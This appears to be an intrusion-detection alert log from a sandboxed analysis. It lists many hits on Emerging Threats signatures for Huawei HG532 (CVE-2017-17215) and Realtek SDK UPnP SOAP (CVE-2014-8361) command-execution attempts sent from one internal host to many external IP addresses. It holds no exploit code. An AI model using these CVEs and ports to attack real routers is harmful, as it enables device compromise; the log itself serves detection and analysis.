                                      07/20/24-23:00:57.222164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5779637215192.168.2.23197.249.133.131
                                      07/20/24-23:00:59.168569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5651237215192.168.2.23197.137.254.119
                                      07/20/24-23:01:40.294677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3942437215192.168.2.23197.141.20.43
                                      07/20/24-23:01:14.105395TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4906037215192.168.2.23142.66.65.211
                                      07/20/24-23:01:47.420081TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614566652869192.168.2.23139.163.81.215
                                      07/20/24-23:01:41.258403TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3389852869192.168.2.23200.70.243.196
                                      07/20/24-23:01:04.113037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5792237215192.168.2.23157.121.210.198
                                      07/20/24-23:01:03.412385TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613833452869192.168.2.23207.112.16.238
                                      07/20/24-23:01:04.053605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5199637215192.168.2.23157.232.245.24
                                      07/20/24-23:00:59.192052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5052437215192.168.2.23197.26.114.175
                                      07/20/24-23:00:57.221223TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4405237215192.168.2.23197.23.80.245
                                      07/20/24-23:01:25.988229TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613798652869192.168.2.2361.172.152.113
                                      07/20/24-23:01:34.050672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4176637215192.168.2.2341.95.161.232
                                      07/20/24-23:01:04.228026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5510037215192.168.2.23197.118.91.27
                                      07/20/24-23:01:42.165780TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24455652869192.168.2.2359.109.143.129
                                      07/20/24-23:01:04.592707TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6059452869192.168.2.23123.31.253.14
                                      07/20/24-23:01:41.275004TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5957252869192.168.2.2353.20.116.108
                                      07/20/24-23:01:32.028836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3521837215192.168.2.23197.21.215.215
                                      07/20/24-23:02:00.709103TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4490252869192.168.2.2367.25.105.249
                                      07/20/24-23:00:59.157444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4848237215192.168.2.23197.160.117.109
                                      07/20/24-23:01:41.366269TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4804252869192.168.2.23159.222.212.200
                                      07/20/24-23:01:34.062277TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4495037215192.168.2.23197.193.238.28
                                      07/20/24-23:01:27.650037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3645637215192.168.2.23187.218.18.191
                                      07/20/24-23:01:41.236294TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5525052869192.168.2.23221.157.224.96
                                      07/20/24-23:01:00.651026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3994037215192.168.2.23197.175.112.209
                                      07/20/24-23:01:04.053604TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5438037215192.168.2.23157.20.58.103
                                      07/20/24-23:01:31.974569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5990437215192.168.2.23197.228.52.144
                                      07/20/24-23:01:08.621030TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24917452869192.168.2.23113.241.155.67
                                      07/20/24-23:01:59.300183TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23464052869192.168.2.2366.14.7.167
                                      07/20/24-23:01:27.653309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4931837215192.168.2.23124.111.25.252
                                      07/20/24-23:01:41.303455TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4466852869192.168.2.23211.87.162.144
                                      07/20/24-23:01:44.491060TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5639452869192.168.2.23194.44.142.130
                                      07/20/24-23:01:20.202325TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5903237215192.168.2.23197.211.124.137
                                      07/20/24-23:01:02.060344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5245637215192.168.2.23157.53.255.241
                                      07/20/24-23:01:07.082045TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3651837215192.168.2.2341.73.95.140
                                      07/20/24-23:01:14.097795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4351237215192.168.2.2312.22.103.21
                                      07/20/24-23:01:31.317668TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3501052869192.168.2.23181.111.14.150
                                      07/20/24-23:01:40.320408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3714637215192.168.2.23158.198.153.222
                                      07/20/24-23:01:44.186066TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614988252869192.168.2.23205.136.89.238
                                      07/20/24-23:01:31.311885TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24708252869192.168.2.23146.31.217.81
                                      07/20/24-23:01:47.604426TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24806052869192.168.2.2389.230.177.62
                                      07/20/24-23:01:44.670285TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5561052869192.168.2.23111.85.168.68
                                      07/20/24-23:01:25.263099TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3399652869192.168.2.23181.111.14.150
                                      07/20/24-23:01:32.059767TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4741637215192.168.2.23157.197.119.108
                                      07/20/24-23:01:56.324972TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24659452869192.168.2.2314.138.152.232
                                      07/20/24-23:01:01.831747TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3704452869192.168.2.23117.27.97.229
                                      07/20/24-23:01:43.392835TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5127052869192.168.2.2331.247.155.57
                                      07/20/24-23:00:59.196993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5331037215192.168.2.23103.34.160.230
                                      07/20/24-23:01:27.749737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3657437215192.168.2.23177.70.134.46
                                      07/20/24-23:01:25.535708TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614151452869192.168.2.23151.115.197.13
                                      07/20/24-23:01:31.976984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4192437215192.168.2.23157.188.148.174
                                      07/20/24-23:01:11.817771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5509437215192.168.2.23157.103.119.53
                                      07/20/24-23:00:59.204975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4726037215192.168.2.238.108.207.220
                                      07/20/24-23:01:11.639230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4588637215192.168.2.234.154.54.81
                                      07/20/24-23:00:59.194576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3420837215192.168.2.23157.121.143.8
                                      07/20/24-23:01:04.236014TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6063452869192.168.2.23124.254.84.115
                                      07/20/24-23:01:46.181357TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23832652869192.168.2.23195.86.64.66
                                      07/20/24-23:01:31.320338TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5713452869192.168.2.2340.231.162.161
                                      07/20/24-23:01:34.050313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3297837215192.168.2.23122.34.30.224
                                      07/20/24-23:01:11.632393TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5204837215192.168.2.2341.202.90.168
                                      07/20/24-23:01:42.213822TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6083052869192.168.2.23137.75.123.123
                                      07/20/24-23:00:59.192052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5693437215192.168.2.23157.223.197.130
                                      07/20/24-23:01:47.931025TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4097652869192.168.2.2358.31.233.114
                                      07/20/24-23:01:04.058922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4887437215192.168.2.2341.42.19.221
                                      07/20/24-23:01:43.528109TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5807652869192.168.2.2379.130.195.101
                                      07/20/24-23:01:31.974907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5066437215192.168.2.2341.6.200.253
                                      07/20/24-23:01:43.843278TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5042452869192.168.2.23152.188.24.161
                                      07/20/24-23:01:10.987935TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613625852869192.168.2.23126.12.83.193
                                      07/20/24-23:01:47.159758TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24483252869192.168.2.2393.0.10.232
                                      07/20/24-23:01:11.631728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4972037215192.168.2.23157.128.103.156
                                      07/20/24-23:01:42.213822TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23944252869192.168.2.23150.125.163.90
                                      07/20/24-23:01:27.654173TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5360037215192.168.2.23197.252.135.214
                                      07/20/24-23:01:41.412156TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4811852869192.168.2.2391.23.23.187
                                      07/20/24-23:01:04.082385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4881837215192.168.2.23197.246.208.103
                                      07/20/24-23:01:44.957555TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24140252869192.168.2.23155.96.29.107
                                      07/20/24-23:01:51.594415TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4410052869192.168.2.23115.65.225.50
                                      07/20/24-23:01:43.091220TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615879452869192.168.2.23101.52.13.24
                                      07/20/24-23:01:44.114134TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6042452869192.168.2.2332.0.100.142
                                      07/20/24-23:01:02.093903TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3761652869192.168.2.23137.195.128.162
                                      07/20/24-23:01:14.117066TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5901037215192.168.2.23197.248.150.138
                                      07/20/24-23:01:59.593869TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615660652869192.168.2.2324.65.233.168
                                      07/20/24-23:02:02.085571TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4784052869192.168.2.2342.127.253.166
                                      07/20/24-23:02:02.671155TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24999452869192.168.2.2358.121.119.159
                                      07/20/24-23:01:04.094795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5516237215192.168.2.23157.87.142.177
                                      07/20/24-23:01:20.596402TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5119252869192.168.2.231.209.93.74
                                      07/20/24-23:01:54.881105TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3349252869192.168.2.23135.46.10.64
                                      07/20/24-23:01:41.443693TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5842452869192.168.2.2370.82.6.11
                                      07/20/24-23:01:52.625240TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4952652869192.168.2.23200.250.178.79
                                      07/20/24-23:01:50.147840TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25921652869192.168.2.2332.64.201.235
                                      07/20/24-23:01:47.652628TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3536252869192.168.2.2395.200.159.137
                                      07/20/24-23:01:00.637175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5850237215192.168.2.23197.160.34.184
                                      07/20/24-23:01:55.944701TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4218852869192.168.2.2346.82.140.27
                                      07/20/24-23:01:00.633355TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5942837215192.168.2.23197.118.130.41
                                      07/20/24-23:01:04.113037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3968237215192.168.2.2341.255.209.13
                                      07/20/24-23:01:41.722890TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4496452869192.168.2.23141.137.71.180
                                      07/20/24-23:01:45.599519TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24964452869192.168.2.2376.8.56.105
                                      07/20/24-23:01:43.300793TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4746652869192.168.2.23136.80.115.81
                                      07/20/24-23:01:52.390301TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615144652869192.168.2.23105.70.135.245
                                      07/20/24-23:02:06.680685TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25401852869192.168.2.2389.86.75.249
                                      07/20/24-23:01:08.599361TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23601452869192.168.2.23213.241.106.75
                                      07/20/24-23:01:31.991336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3299437215192.168.2.23197.240.6.181
                                      07/20/24-23:01:31.982478TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4831837215192.168.2.2341.13.252.227
                                      07/20/24-23:01:43.147883TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613403052869192.168.2.2363.137.171.145
                                      07/20/24-23:01:47.829810TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614694252869192.168.2.23207.5.145.91
                                      07/20/24-23:01:14.014458TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5921837215192.168.2.23197.8.46.56
                                      07/20/24-23:01:48.445925TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4308852869192.168.2.23185.97.134.51
                                      07/20/24-23:01:44.560666TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4111652869192.168.2.23174.126.153.78
                                      07/20/24-23:01:51.060408TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23423852869192.168.2.23129.173.36.90
                                      07/20/24-23:01:48.918065TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4348852869192.168.2.2335.61.70.96
                                      07/20/24-23:01:11.636599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3878637215192.168.2.2325.61.31.63
                                      07/20/24-23:01:31.976984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4025837215192.168.2.238.98.251.144
                                      07/20/24-23:01:02.768078TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6048852869192.168.2.2386.86.67.253
                                      07/20/24-23:01:40.286738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4293837215192.168.2.23157.79.124.73
                                      07/20/24-23:01:42.462291TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3995252869192.168.2.23186.129.147.154
                                      07/20/24-23:01:51.979093TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614777252869192.168.2.239.97.212.169
                                      07/20/24-23:02:00.371741TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24142652869192.168.2.2339.135.72.98
                                      07/20/24-23:01:04.085431TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5317637215192.168.2.23157.209.153.245
                                      07/20/24-23:01:51.790169TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23752852869192.168.2.23183.223.8.125
                                      07/20/24-23:01:44.059102TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5789252869192.168.2.23162.230.61.146
                                      07/20/24-23:01:24.944299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3416037215192.168.2.2364.137.17.221
                                      07/20/24-23:01:24.904906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3850637215192.168.2.2347.200.89.27
                                      07/20/24-23:01:03.290547TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3830852869192.168.2.23129.27.232.7
                                      07/20/24-23:01:47.934101TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3473052869192.168.2.23212.5.145.192
                                      07/20/24-23:01:11.817297TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3862837215192.168.2.2341.4.213.77
                                      07/20/24-23:01:54.704194TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5181652869192.168.2.2367.74.143.214
                                      07/20/24-23:01:43.147883TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3928452869192.168.2.23189.66.149.229
                                      07/20/24-23:01:46.893328TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5899252869192.168.2.2335.221.171.171
                                      07/20/24-23:01:43.141192TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5872652869192.168.2.2348.248.156.6
                                      07/20/24-23:01:11.639230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3899037215192.168.2.23157.62.189.35
                                      07/20/24-23:01:20.110860TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5342437215192.168.2.23216.95.253.44
                                      07/20/24-23:01:09.030401TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23608452869192.168.2.23184.60.97.199
                                      07/20/24-23:01:41.260372TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615570252869192.168.2.23165.21.238.229
                                      07/20/24-23:01:50.085627TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4268652869192.168.2.23138.246.10.144
                                      07/20/24-23:01:13.694393TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5807652869192.168.2.23140.34.53.233
                                      07/20/24-23:01:44.203130TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613846852869192.168.2.23173.68.146.233
                                      07/20/24-23:01:43.557453TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3959252869192.168.2.23197.85.104.215
                                      07/20/24-23:01:24.867858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4600237215192.168.2.23208.252.51.218
                                      07/20/24-23:01:41.228794TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614202452869192.168.2.231.216.69.165
                                      07/20/24-23:01:47.342227TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23838052869192.168.2.23105.139.214.54
                                      07/20/24-23:01:41.702437TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23697252869192.168.2.23176.90.235.184
                                      07/20/24-23:01:07.061779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4028437215192.168.2.23197.70.24.118
                                      07/20/24-23:01:02.070492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3345637215192.168.2.23117.206.232.47
                                      07/20/24-23:01:06.991143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5580837215192.168.2.23157.5.95.219
                                      07/20/24-23:00:57.221301TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4997437215192.168.2.23197.231.189.109
                                      07/20/24-23:01:32.034562TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3301637215192.168.2.2341.52.129.29
                                      07/20/24-23:01:42.699598TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24381052869192.168.2.23113.209.32.105
                                      07/20/24-23:01:53.863938TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5859452869192.168.2.2366.250.122.217
                                      07/20/24-23:01:08.611391TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4815052869192.168.2.23130.136.141.197
                                      07/20/24-23:01:31.983105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3293437215192.168.2.2341.17.248.200
                                      07/20/24-23:01:40.336908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5255637215192.168.2.23157.164.227.86
                                      07/20/24-23:01:48.490989TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5810052869192.168.2.23195.45.218.64
                                      07/20/24-23:01:45.096837TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24192652869192.168.2.23167.73.249.89
                                      07/20/24-23:01:26.156407TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613889852869192.168.2.23148.228.70.58
                                      07/20/24-23:01:44.730531TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614579652869192.168.2.2381.144.207.10
                                      07/20/24-23:01:40.319856TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4191037215192.168.2.23109.208.87.26
                                      07/20/24-23:01:21.909111TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5712837215192.168.2.2341.119.255.118
                                      07/20/24-23:01:46.810790TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4535052869192.168.2.23169.129.60.246
                                      07/20/24-23:01:42.656154TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6062252869192.168.2.23148.6.1.136
                                      07/20/24-23:01:45.164161TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4248252869192.168.2.2386.220.55.191
                                      07/20/24-23:01:11.818830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5901237215192.168.2.23157.178.193.168
                                      07/20/24-23:01:43.877765TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614609452869192.168.2.23183.90.49.252
                                      07/20/24-23:01:01.494643TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615524052869192.168.2.2323.94.137.105
                                      07/20/24-23:01:26.019285TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615876052869192.168.2.2336.125.123.117
                                      07/20/24-23:01:44.954688TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3632252869192.168.2.23194.45.44.116
                                      07/20/24-23:01:24.883172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3974637215192.168.2.23111.144.175.212
                                      07/20/24-23:01:40.321965TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5325237215192.168.2.23197.122.17.30
                                      07/20/24-23:01:49.387850TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5049252869192.168.2.2348.81.156.141
                                      07/20/24-23:01:55.594888TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24111652869192.168.2.2359.99.39.216
                                      07/20/24-23:01:20.124696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4261637215192.168.2.23197.124.243.228
                                      07/20/24-23:01:43.571815TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4476452869192.168.2.23125.78.0.230
                                      07/20/24-23:01:47.092270TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5731052869192.168.2.23187.119.209.224
                                      07/20/24-23:01:25.347089TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614524652869192.168.2.2349.81.102.7
                                      07/20/24-23:01:43.621955TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4083252869192.168.2.23123.6.144.179
                                      07/20/24-23:01:02.275811TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613720252869192.168.2.2318.37.139.58
                                      07/20/24-23:01:44.099799TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4338452869192.168.2.23101.122.117.242
                                      07/20/24-23:01:04.085431TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3797837215192.168.2.23197.179.7.146
                                      07/20/24-23:01:42.486106TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613296452869192.168.2.2386.248.56.62
                                      07/20/24-23:01:42.985200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4804452869192.168.2.2312.82.126.36
                                      07/20/24-23:01:43.921490TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5253852869192.168.2.2348.218.79.196
